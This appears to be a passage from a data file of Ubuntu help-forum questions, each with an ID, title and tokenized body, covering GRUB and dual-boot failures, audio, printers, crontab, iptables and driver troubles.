ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 17.485749 ] cfg80211 : calling crda for country : us [ 17.487071 ] cfg80211 : regulatory domain changed to country : us [ 17.487073 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 17.487074 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 17.487075 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 17.487076 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.487077 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.487077 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 17.487078 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 17.487079 ] cfg80211 : ( 57240000 khz - 63720000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 72.172480 ] usb 3-12 : new high-speed usb device number 6 using xhci_hcd [ 72.189168 ] usb 3-12 : new usb device found , idvendor=13fe , idproduct=3e00 [ 72.189170 ] usb 3-12 : new usb device strings : mfr=1 , product=2 , serialnumber=0 [ 72.189171 ] usb 3-12 : product : 2267 pram [ 72.189171 ] usb 3-12 : manufacturer : [ 72.209613 ] usb-storage 3-12:1.0 : usb mass storage device detected [ 72.209723 ] scsi6 : usb-storage 3-12:1.0 [ 72.209783 ] usbcore : registered new interface driver usb-storage [ 73.210329 ] scsi 6:0:0:0 : direct-access 2267 pram 1.00 pq : 0 ansi : 0 ccs [ 73.210496 ] sd 6:0:0:0 : attached scsi generic sg2 type 0 [ 73.210974 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 96.456242 ] hda-intel : irq timing workaround is activated for card # 0 . suggest a bigger bdl_pos_adj . tony @ tony-desktop ~ $
409875	install fails for hpz820	i 'm trying to install ubuntu 13.04 desktop version on a hp z820 machine . no dual boot - only ubuntu on a clean system . the installation fails . i get the message '' grub install dummy failed . this is a fatal error '' and it quits installation . if i look at the command log prior to the error , it says that /boot/grub is not readable during boot . i thought it was some uefi options and changed bios settings for hard drives to be uefi boot but i get the same error .
409876	i ca n't use print button	i use ubuntu 13.10 version and i ca n't use print button why it ca n't work ? i think something wrong at software update before software update , i can use print button . but , now , i ca n't do that who can i do that problem ?
409877	consolidating hard disks into one machine leads to grub `` a disk read error occurred '' with win7	situation : my older win7 laptop died ( power issues ) . my new kubuntu computer has an extra drive bay , so i 'm trying to get dual boot to make them play nice together in the same machine . both drives boot fine if they are /sda , and both os show up on grub2 . the kubuntu is expendable , the win7 is not ( school stuff , solidworks and all that jazz ) . i am on a hp pavillion dv7 from 3 years ago . problems : when ubuntu is /sda , the computer boots to grub . i can boot kubuntu fine , but if win7 is selected ( /sdb ) , it prints the `` a disk read error occurred '' error . when win7 is /sda , it boots win7 fine , but with no option for kubuntu . not sure what happens if boot order is switched , as my bios only has an option for internal notebook drive . it does know that there are two drives that can be memchecked though . i think part of the problem may come from this ( full log here ) : sdb1 : __________________________________________ file system : ntfs boot sector type : windows 7/2008 : ntfs boot sector info : according to the info in the boot sector , sdb1 starts at sector 2048 . but according to the info from fdisk , sdb1 starts at sector 63 . the info in boot sector on the starting sector of the mft is wrong . according to the info in the boot sector , sdb1 has 407551 sectors , but according to the info from fdisk , it has 1984 sectors . operating system : boot files : /bootmgr /boot/bcd but i do n't know enough about ubuntu to fix it , and i 'm certain i 'd break my windows forever . should i reinstall kubuntu when both drives are present ? what other info would be helpful ? any help would be very appreciated .
409879	pulseaudio fails to run after disconnecting hdmi cable	after using a hdmi cable i lose the ability to control sound setting . the sound still works ( i can play music or even watch videos and listen to them ) , but the speaker indicator is gone and i can not raise or lower the volume with the usual volume key or in system settings . i noticed that pulseaudio was not able to start . whenever i log in as a guest the indicator appeared and pulseaudio started . i have been able to correct the problem by deleting the /pulse folder in /home/ ( user ) /.config . after rebooting the indicator came back , i 'm able to control the volume and pulseaudio starts normally . the problem is that whenever i use hdmi it messes pulseaudio . i do n't want to keep deleting the .config folder every time . also by doing so i will lose settings of pulseaudio equalizer . is there a way i can prevent that from happening ? i 'm running ubuntu 13.10 on my acer v7 ultrabook . this is what i get after $ pulseaudio -d e : [ pulseaudio ] main.c : daemon startup failed . and this is /etc/pulse/default.pa # ! /usr/bin/pulseaudio -nf # this file is part of pulseaudio . # # pulseaudio is free software ; you can redistribute it and/or modify it # under the terms of the gnu lesser general public license as published by # the free software foundation ; either version 2 of the license , or # ( at your option ) any later version . # # pulseaudio is distributed in the hope that it will be useful , but # without any warranty ; without even the implied warranty of # merchantability or fitness for a particular purpose . see the gnu # general public license for more details . # # you should have received a copy of the gnu lesser general public license # along with pulseaudio ; if not , write to the free software foundation , # inc. , 59 temple place , suite 330 , boston , ma 02111-1307 usa . # this startup script is used only if pulseaudio is started per-user # ( i.e . not in system mode ) .nofail # # # load something into the sample cache # load-sample-lazy x11-bell /usr/share/sounds/gtk-events/activate.wav # load-sample-lazy pulse-hotplug /usr/share/sounds/startup3.wav # load-sample-lazy pulse-coldplug /usr/share/sounds/startup3.wav # load-sample-lazy pulse-access /usr/share/sounds/generic.wav .fail # # # automatically restore the volume of streams and devices load-module module-device-restore load-module module-stream-restore load-module module-card-restore # # # automatically augment property information from .desktop files # # # stored in /usr/share/application load-module module-augment-properties # # # should be after module-*-restore but before module-*-detect load-module module-switch-on-port-available # # # load audio drivers statically # # # ( it 's probably better to not load these drivers manually , but instead # # # use module-udev-detect -- see below -- for doing this automatically ) # load-module module-alsa-sink # load-module module-alsa-source device=hw:1,0 # load-module module-oss device= '' /dev/dsp '' sink_name=output source_name=input # load-module module-oss-mmap device= '' /dev/dsp '' sink_name=output source_name=input # load-module module-null-sink # load-module module-pipe-sink # # # automatically load driver modules depending on the hardware available .ifexists module-udev-detect.so load-module module-udev-detect .else # # # use the static hardware detection module ( for systems that lack udev support ) load-module module-detect .endif .ifexists module-android-audio-hal.so load-module module-android-audio-hal .endif # # # automatically connect sink and source if jack server is present .ifexists module-jackdbus-detect.so .nofail load-module module-jackdbus-detect channels=2 .fail .endif # # # automatically load driver modules for bluetooth hardware .ifexists module-bluetooth-policy.so load-module module-bluetooth-policy .endif .ifexists module-bluetooth-discover.so load-module module-bluetooth-discover .endif # # # load several protocols .ifexists module-esound-protocol-unix.so load-module module-esound-protocol-unix .endif load-module module-native-protocol-unix # # # network access ( may be configured with paprefs , so leave this commented # # # here if you plan to use paprefs ) # load-module module-esound-protocol-tcp # load-module module-native-protocol-tcp # load-module module-zeroconf-publish # # # load the rtp receiver module ( also configured via paprefs , see above ) # load-module module-rtp-recv # # # load the rtp sender module ( also configured via paprefs , see above ) # load-module module-null-sink sink_name=rtp format=s16be channels=2 rate=44100 sink_properties= '' device.description='rtp multicast sink ' '' # load-module module-rtp-send source=rtp.monitor # # # load additional modules from gconf settings . this can be configured with the paprefs tool . # # # please keep in mind that the modules configured by paprefs might conflict with manually # # # loaded modules . .ifexists module-gconf.so .nofail load-module module-gconf .fail .endif # # # automatically restore the default sink/source when changed by the user # # # during runtime # # # note : this should be loaded as early as possible so that subsequent modules # # # that look up the default sink/source get the right value load-module module-default-device-restore # # # automatically move streams to the default sink if the sink they are # # # connected to dies , similar for sources load-module module-rescue-streams # # # make sure we always have a sink around , even if it is a null sink . load-module module-always-sink # # # honour intended role device property load-module module-intended-roles # # # automatically suspend sinks/sources that become idle for too long load-module module-suspend-on-idle # # # if autoexit on idle is enabled we want to make sure we only quit # # # when no local session needs us anymore . .ifexists module-console-kit.so load-module module-console-kit .endif .ifexists module-systemd-login.so load-module module-systemd-login .endif # # # enable positioned event sounds load-module module-position-event-sounds # # # cork music/video streams when a phone stream is active # load-module module-role-cork # # # modules to allow autoloading of filters ( such as echo cancellation ) # # # on demand . module-filter-heuristics tries to determine what filters # # # make sense , and module-filter-apply does the heavy-lifting of # # # loading modules and rerouting streams . load-module module-filter-heuristics load-module module-filter-apply # x11 modules should not be started from default.pa so that one daemon # can be shared by multiple sessions . # # # load x11 bell module # load-module module-x11-bell sample=bell-windowing-system # # # register ourselves in the x11 session manager # load-module module-x11-xsmp # # # publish connection data in the x11 root window # .ifexists module-x11-publish.so # .nofail # load-module module-x11-publish # .fail # .endif # # # make some devices default # set-default-sink output # set-default-source input
409880	how to `` save '' a rotated pdf file	i have a pdf file shown upside down . so i use okular to rotate it and it looks good . the problem is , the next time i open it with other software , it 's still upside down . if i open it with okular , it is not . i am wondering what 's happening underhood . i do have write permission on that file . i tried `` save a copy to '' , but no effect . actually , there is no save operation needed to be done . the file seems not even been modified after i rotate in okular .
409885	how can i recover my hard disk data that got erased when i tried to setup ubuntu ?	i tried to install ubuntu in my laptop that had windows 7 and i chose 'erase partition ' as i was thinking it will erase the c partition only so as to make it the ubuntu drive .after restart i found the whole hard disk mounted as one partition with no data .so is there any way to return back my data or is it impossible ?
409889	anyone has a decent ubuntu 13.10 apache 2.4 multivhost setup ?	i am frustrated with the new format settings apache 2.4.6 someone would have any easy way to set up an apache multivhost using ubuntu 13.10 ? regards
409891	dependency which is missing , however package not broken ?	the context i wanted to audit my installed packages . i created a python helper invoking dpkg-query , to create a packages database using python dictionary and lists . the helper is smart enough to check dependencies are indeed present in the dictionary cloning the installed packages database . i get an error with the wings3d package : â the helper notified me a package named erlang-abi-13.a is missing . synaptic tells me this package is not installed . it still list this package as a wings3d dependency , but displays it in dependency , using italic instead of regular font . the question ( s ) what does it mean when synaptic displays a dependency using italic ? how a dependency may be missing while the package seems not to be broken ?
409893	no audio output from sound card to program	i am a ham radio op -- running a program called fldigi . works fine under xp , which i hate to use . however , under ubuntu 10.04 , running alsa and pulse audio , i can not get sound from the sound card coming in from the radio to go to the program . it comes through the headphones well . i also can not get any audio output from the program to the radio . i have been around the block trying this , that and t'other thing -- messing with sound card configuration , etc. , to no avail .
409894	matlab compilation returning an error when run	after putting in numerous hours , i felt ready to run my code on my friend 's high end computer . i compiled my application ( named zeta ) . however , when i entered : sh '/home/nicbit/desktop/run_zeta.sh ' /usr/local/matlab/matlab_compiler_runtimed to test this on my computer , i received the following error code : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- setting up environment variables -- - ld_library_path is . : /usr/local/matlab/matlab_compiler_runtime/runtime/glnxa64 : /usr/local/matlab/matlab_compiler_runtime/bin/glnxa64 : /usr/local/matlab /matlab_compiler_runtime/sys/os/glnxa64 : /usr/local/matlab/matlab_compiler_runtime /sys/java/jre/glnxa64/jre/lib/amd64/native_threads : /usr/local/matlab /matlab_compiler_runtime/sys/java/jre/glnxa64/jre/lib/amd64/server : /usr/local/matlab /matlab_compiler_runtime/sys/java/jre/glnxa64/jre/lib/amd64/client : /usr/local/matlab /matlab_compiler_runtime/sys/java/jre/glnxa64/jre/lib/amd64 /home/nicbit/desktop/run_zeta.sh : 1 : eval : /home/nicbit/desktop/zeta : permission denied in response i tried : sudo sh '/home/nicbit/desktop/run_zeta.sh ' /usr/local/matlab/matlab_compiler_runtimed which resulted in the same error . i also chmoded the file so that ls -la '/home/nicbit/desktop/run_zeta.sh' returns : -rwxrwxrwx 1 nicbit nicbit 1135 jan 23 18:50 /home/nicbit/desktop/run_zeta.sh but the same error code resulted . does anyone know how to solve this issue . thank you
409897	any reason to not install both bootloader and ubuntu to external hdd ?	i currently have a dual boot arrangement on my primary ( internal ) hdd which includes win7 and ubuntu . i 've also procured a 500 gb external usb hdd and was thinking of installing one or more distros on it . would it behoove me to also install grub to the external drive and then use my boot order option at machine startup to select the external hdd at a time of my choosing ? it seems like adding multiple distros to a single bootloader on the internal drive could have some disadvantages should my internal drive fail ? i suppose a usb stick drive would still be an option as a bailout plan but a fully operational and bootable install would seem even better . is this sound logic or are there disadvantages to that plan i have n't considered ?
409899	how to install a fuji xerox docuprint m255 z on ubuntu 12.04 - printer is on a windows network	i have a number of desktop pcs running ubuntu 12.04 on our windows network . i have set up a fuji xerox docuprint m255z with a fixed ip address . is there a driver i can install for it ?
409900	how can i boot back into windows 8 after intalling ubuntu ?	so , i have a dell laptop , and i 've been interested in dual booting windows 8 and ubuntu , just because ubuntu seems interesting and i enjoy fiddling with things . i have ubuntu up and running , but now i ca n't access windows 8 . it 's not even an option in the uefi boot configuration . i made sure not to agree to wiping or formatting anything . the only thing i did that made me a little suspicious was create a partition that was 500 gb , the size of my hard drive . all i would like to do is boot back into windows 8 if possible . if not , i guess i 'm learning all about ubuntu today .
409902	banshee 2.9 in ubuntu 12.04 ? there must be an easier way than the current answer !	via the official banshee ppa in ubuntu 12.04 it will only get banshee 2.6.1 but if you installed banshee in trusty before feb. 11 , 2014 it would install banshee 2.9.0 . but the main question is how to get banshee 2.9 in ubuntu 12.04 . most websites say just use the ppa but it only gets 2.6.1 , so how do i get 2.9.0 in 12.04 ? i 'll try installing 2.9.0 in 12.04 using this packaged when i have time : https : //launchpad.net/ubuntu/+archive/primary/+files/banshee_2.9.0.orig.tar.xz i 'll post the dependencies issue 's below here so someone could help .
409903	post installing comodo issues	i have installed comodo antivirus for my ubuntu 12.04 , even if i 'm a newbie i managed to enter finalize the installation , you know when you have to type sudo /opt/comodo/post_setup.sh , went through the long and boring licence agreement but then i got this message in the end : build the redirfs kernel modules for real-time protection ... then linux kernel source or linux kernel headers for your current kernel version 3.8.0-35-generic can not be found . please install the kernel source or kernel headers for 3.8.0-35-generic , then run this script again . make -c /lib/modules/`uname -r`/build m=/tmp/driver/redirfs modules make : *** /lib/modules/3.8.0-35-generic/build : no such file or directory . stop . make : *** [ all ] error 2 make -c /lib/modules/`uname -r`/build m=/tmp/driver/redirfs modules_install make : *** /lib/modules/3.8.0-35-generic/build : no such file or directory . stop . make : *** [ install ] error 2 fatal : module redirfs not found . redirfs kernel modules installation failed . the cmdagent is not running ! $ starting cmdagent : start-stop-daemon : unable to start /opt/comodo/cmdagent ( no such file or directory ) the cmdagent failed to start ! the cmgdaemon is not running ! $ starting cmgdaemon : start-stop-daemon : unable to start /opt/comodo/cmgdaemon ( no such file or directory ) the cmgdaemon failed to start ! comodo antivirus is successfully configured , you can start it from menu or desktop . so i can not run the program . what can i do ? what does this all mean and what can i do ? i 'm new to this so please make this simple .
409905	apt-get : error loading libgcc_s.so.1	i am using ubuntu 12.04.3 lts , 64-bit , with gcc 4.6.3 i want to update gcc to 4.7 , and do as the link said : how do i install gcc 4.7 ? but i got error : fetched 14.0 mb in 18s ( 767 kb/s ) ( reading database ... 205536 files and directories currently installed . ) preparing to replace libgcc1 1:4.6.3-1ubuntu5 ( using ... /libgcc1_1 % 3a4.8.1-2ubuntu1~12.04_amd64.deb ) ... unpacking replacement libgcc1 ... dpkg : error processing /var/cache/apt/archives/libgcc1_1 % 3a4.8.1-2ubuntu1~12.04_amd64.deb ( -- unpack ) : trying to overwrite '/lib/x86_64-linux-gnu/libgcc_s.so.1 ' , which is also in package gcc-4.6 4.6.3-1ubuntu5 errors were encountered while processing : /var/cache/apt/archives/libgcc1_1 % 3a4.8.1-2ubuntu1~12.04_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) so i remove gcc 4.6 : sudo apt-get remove gcc-4.6 sudo apt-get update apt-get : error while loading shared libraries : libgcc_s.so.1 : can not open shared object file : no such file or directory now apt-get , vi ca n't work any more .
409907	desktop disappeared	for some reason , the icons that were on my desktop have disappeared . i am unable to left click on the desktop and do anything like i used to . any ideas of why it is all of a sudden hiding my desktop icons and folders ? and how i can have the show back up , and to activate my left click on the desktop .
409909	can i use my panasonic vdr-d100 in ubuntu ?	is it possible to use a panasonic vdr-d100 with ubuntu ? i have googled around and saw nothing related about it . the camcorder is so old . i want to be able to capture video with c++ but taught it best to get it working with gui . installed cheese and kino and neither recognized it . i think the problem is on the kernel level . found nothing during the searching around . i have a dell latitude d630 with xubuntu 12.04.3 lts precise pangolin - release i386 lsusb bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 002 : id 0b97:7761 o2 micro , inc. oz776 1.1 hub bus 007 device 003 : id 0b97:7772 o2 micro , inc. oz776 ccid smartcard reader lspci 00:00.0 host bridge : intel corporation mobile pm965/gm965/gl960 memory controller hub ( rev 0c ) 00:01.0 pci bridge : intel corporation mobile pm965/gm965/gl960 pci express root port ( rev 0c ) 00:1a.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 4 ( rev 02 ) 00:1a.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 5 ( rev 02 ) 00:1a.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 2 ( rev 02 ) 00:1b.0 audio device : intel corporation 82801h ( ich8 family ) hd audio controller ( rev 02 ) 00:1c.0 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 1 ( rev 02 ) 00:1c.1 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 2 ( rev 02 ) 00:1c.5 pci bridge : intel corporation 82801h ( ich8 family ) pci express port 6 ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 1 ( rev 02 ) 00:1d.1 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 2 ( rev 02 ) 00:1d.2 usb controller : intel corporation 82801h ( ich8 family ) usb uhci controller # 3 ( rev 02 ) 00:1d.7 usb controller : intel corporation 82801h ( ich8 family ) usb2 ehci controller # 1 ( rev 02 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev f2 ) 00:1f.0 isa bridge : intel corporation 82801hm ( ich8m ) lpc interface controller ( rev 02 ) 00:1f.1 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) ide controller ( rev 02 ) 00:1f.2 ide interface : intel corporation 82801hm/hem ( ich8m/ich8m-e ) sata controller [ ide mode ] ( rev 02 ) 00:1f.3 smbus : intel corporation 82801h ( ich8 family ) smbus controller ( rev 02 ) 01:00.0 vga compatible controller : nvidia corporation g86m [ quadro nvs 135m ] ( rev a1 ) 03:01.0 cardbus bridge : o2 micro , inc. cardbus bridge ( rev 21 ) 03:01.4 firewire ( ieee 1394 ) : o2 micro , inc. firewire ( ieee 1394 ) ( rev 02 ) 09:00.0 ethernet controller : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express ( rev 02 ) 0c:00.0 network controller : intel corporation pro/wireless 3945abg [ golan ] network connection ( rev 02 )
409910	bluetooth disconnects from phone ubuntu 13.10	i recently upgraded to ubuntu13.10 from 12.04 . under 12.04 my bluetooth connection to my phone worked just fine . i pull my pics from the phone to the desktop . i can n't connect under 13.10 , when i attempt to access a file i get disconnected . i am not sure which side initiates the disco . not sure where to begin with this one . i do not find any hits on the internet that appear to address this . i have deleted and repaired the devices .
409913	minecraft spigot server bungeecord and iptables help	i have had a bungeecord server set up before and i know how it works . the problem i am having is with my iptables configuration . these are my iptables rules : # ! /bin/sh # input iptables -p input drop iptables -a input -i eth0 -p tcp -- dport 25565 -m conntrack -- ctstate new , established -j accept iptables -a input -i eth0 -p tcp -- dport 25566 -m conntrack -- ctstate new , established -j accept iptables -a input -m conntrack -- ctstate established , related -j accept # forward iptables -p forward drop # output iptables -p output drop iptables -a output -o eth0 -p tcp -- sport 25565 -m conntrack -- ctstate new , established -j accept iptables -a output -o eth0 -p tcp -- sport 25566 -m conntrack -- ctstate new , established -j accept iptables -a output -m conntrack -- ctstate new , established , related -j accept now , i opened the ports 25565 and 25566 because my bungeecord server and lobby server are running on those ports . i can not connect to my server with the default policies for input and output as drop but i can if i set the policies to accept . the error message i get is this : could not connect to default server , please try again later : io.netty.channel.connecttimeoutexception i know the ports 25565 and 25566 are opened correctly because if i run the lobby server on 25565 i can connect . my question is this : what iptables rule do i need to add to make the server function properly with bungeecord ? could it be that i need to increase the timeout of the server ?
409914	unbuntu 12.04 suddenly having trouble connecting to internet wireless or wired	i am not tech savvy , so please give me explicit instructions if you have a solution . this problem has gotten progressively worse . here goes : i 've been using ubuntu 12.04 with a d-link wireless router for over a year without problems . the problem began a few weeks ago . it would not connect to the router , though it recognized the network . i could usually solve this by rebooting the router . that is not working any more . now , most of the time i open ubuntu it will not connect at all ( i have dual-boot with windows and an ipad and in most cases they can still connect ) . yesterday , the wireless worked on one occasion , but not on two others . today it is not working at all and when i try a wired connection that is not working either . please help ! output of sudo lshw -c network -numeric *-network description : wireless interface product : centrino advanced-n 6230 [ rainbow peak ] [ 8086:91 ] vendor : intel corporation [ 8086 ] physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 34 serial : 88:53:2e:62 : bf:97 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.2.0-58-generic-pae firmware=18.168.6.1 ip=192.168.0.103 latency=0 link=yes multicast=yes wireless=ieee 802.11abgn resources : irq:49 memory : c7400000-c7401fff *-network description : ethernet interface product : rtl8111/8168/8411 pci express gigabit ethernet controller [ 10ec:8168 ] vendor : realtek semiconductor co. , ltd. [ 10ec ] physical id : 0 bus info : pci @ 0000:05:00.0 logical name : eth0 version : 06 serial : f0 : bf:97 : da:88 : ca size : 10mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8168e-2.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:47 ioport:3000 ( size=256 ) memory : c3404000-c3404fff memory : c3400000-c3403fff btw , i have recently come upon some evidence that the problem might be with the router . strange that only my ubuntu operating system does n't connect regularly , but my neighboir told me that he has had some trouble connecting with his mac , though that is usually solved simply by rebooting the router . lem me know if you have any insights .
409918	applying proxy button is not shown	in my system whenever i try to apply proxy i never see '' apply proxy system wide '' button i have seen this problem on some other ubuntu systems too ! what should i do ? ? how do i apply proxy system wide ?
409920	automatic suspend	i just bought acer netbook which came with ubuntu one program , whenever i 'm watching videos on youtube system gives me warning that netbook will automatically suspend because of inactivity and it does if i do n't press cancel . please tell me why does it happen and what can i do to stop it . thank you
409922	my webcam is not recording videos	my webcam is not recording videos with cheese . it is showing the following errors : - mani @ mani-3000-n100 : ~ $ cheese fontconfig error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 14 : out of memory fontconfig error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 23 : out of memory fontconfig error : `` /etc/fonts/conf.d/65-khmer.conf '' , line 32 : out of memory ( cheese:3370 ) : gstreamer-critical ** : gst_mini_object_unref : assertion 'mini_object ! = null ' failed ( cheese:3370 ) : cheese-warning ** : filter caps do not completely specify the output format ( cheese:3370 ) : cheese-warning ** : internal data flow error .
409923	how to install a tarball into ubuntu 13.10	this is not the first time i 've run into this problem , but the files are part of a course i 'm taking and it starts in a week . the file downloaded under the name `` linuxlaffpkg.tar.bz2 '' . the instructions on the site said open it with an unzip app , which i did . it gave me a folder called `` laff '' , which contains several folders , several files whose icons are purple diamonds , two text files starting with `` lib '' , one text file called `` qt.conf '' , and a text file called `` run.sh '' . prior posts suggest looking for a file called `` install '' ( none here ) . i tried xdg-open on run.sh and it just opened the file in gedit . i tried to run the run.sh in the terminal and it gave me an error message . also the post said the classical steps in installation are /.configure , make , and sudo make install or sudo checkinstall . my terminal does n't know what `` configure '' is . i have plenty to learn about ubuntu and i hope you can teach me the next few things .
409925	install will not proceed	ok , so i am very much new to linux , and i have been trying for a few days to install ubuntu alongside windowsxp . i have tried both bootable usb and a live system disc . both start and run as live systems , but when i click my language and then click continue to install , the cursor just sits and spins . i know that os installs can sometimes take a while , but 6+ hours is a little ridiculous . so far , here 's what i have done : i have already partitioned the hard drive with 70gb of space while in windows . i have tried installing while connected to the internet and without it . nothing seems to work . i have also tried ubuntu 13.10 , 13.04 , and 12.04.3 lts . and , just for the fun of it , i even tried zorin os 7.1 just to see if it might work . same results with the never ending spinning cursor ... i would really appreciate any help !
409926	installing ubuntu-touch on lenovo s6000 ideapad	i 'm about to install ubuntu-touch on my lenovo s6000 but could n't find the model 's name in the supported devices list , what should i expect ?
409928	13.10 with mate and clearlooks : some gtk apps are mostly black	after upgrading to ubuntu 13.10 and wiping all configuration files and folders from my home directory , i chose `` clearlooks '' as theme in mate-appearance-properties . most applications look nice , but some ( maybe gtk2 ones ? ) are largely black , as if the theme is broken : gucharmap and gitg show the black elements , while gtk-demo looks totally fine . what could the reason be , and how can i fix that ?
409930	dualboot 32win & 64mac from live usb +persistance	so i have a 32 bit live usb with persistance that i use to write code , cause that 's just how i roll . i can boot it onto my school computers ( 32 bit win ) no problem , but obviously not my mac ( 2007 imac , 64 bit ) . currently i use vmware fusion 6 pro and a plop linux image to use the usb at home , but i can only get 900mb of ram for my vm . i was hoping to make a live usb that can boot 32 bit and 64 bit for mac , with a shared persistance file , this way i can use my computer 's full 2gb . also , i 'm not allowed edit any part of this mac . do not reply telling me it 's impossible . please only solutions . thank you , and have a unicorntastic day !
409931	setting up network printer ubuntu 13.10	new ubuntu 13.10 laptop file sharing is working fine . according to one post : go to the printers applet press the add printer button select network printer select find network printer problem , when i select [ add printer ] i do not have the [ find network printer ] option . what is missing ?
409932	no crontab for [ username ] - using an empty one	i want to run a bash file ( abc.sh ) on the desktop that runs a python file on the desktop as well . how can i do that ? i tried to do the following simple task just to test the crontab : ( here the abc.sh script is supposed to make a folder on the desktop ) : what i did on terminal crontab -e added the following below all the comment when crontab opened in the terminal itself . * * * * * abc.sh code inside abc.sh # ! /bin/bash cd /home/ebrisk/desktop mkdir `` testcrontab '' i understand that it might have to do something with the path environment variables but that 's about it . i do n't understand their answers . please help , thanks .
409933	gedit showing `` glib-gobject-critical etc.. '' after closing ?	i got this message inside terminal every time i close geidt after saving my file . it started to happen after i installed gnome 3.5.4 version in ubuntu , shall i remove gnome or the issue is something else ? here is the message i am getting : ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed ( gedit:5992 ) : glib-gobject-critical ** : g_object_add_weak_pointer : assertion `g_is_object ( object ) ' failed
409934	thinkpad r31 usb install ( k / x / l ) ubuntu	i 'm trying to install linux on the older thinkpad r31 . i have several cd 's but the optical disk drive seems to have passed away or is simply dying . i made an usb stick woth unetbootin to install from usb . but it seems i can not boot from usb . i 've read ( and replied as i thought it was a valuable contribution to one of the replies ) this post : how to install ubuntu on a ibm r31 thinkpad my boot devices list is without an usb device and i found at the lenovo support pages that boot usb support is mentioned on the x31 page regarding a bios update , but i can not read anything about boot usb support for the r31 on its lenovo bios update support page . lenovo r31 support page : http : //support.lenovo.com/en_us/downloads/detail.page ? docid=ds014002 lenovo x31 support page : http : //support.lenovo.com/en_us/downloads/detail.page ? docid=ds003898 where this is written : reserved area the following conventional memory addresses are reserved by bios and others . •c0000-cffff : reserved for video bios •d0000-d3fff : reserved for option rom of ethernet ( *2 ) •dc000-dffff : reserved for usb bios ( *3 ) •e0000-fffff : reserved for system bios notes : • ( *2 ) this area becomes free by disabling the internal network option rom option under config and network in the bios setup utility . but , if disabled , both wake-on-lan and pxe boot functions do not work . • ( *3 ) this area becomes free by disabling the usb bios support option under config and usb in the bios setup utility . even if disabled , the usb devices work under the windows environment . how can i achieve this on the r31 ?
409938	plugins/extension to download videos ( similar to idm )	how can i download videos on youtube and other platforms . which is the best downloader compared to idm in windows . how do i configure it and its extension in any browser on linux for example chromium ?
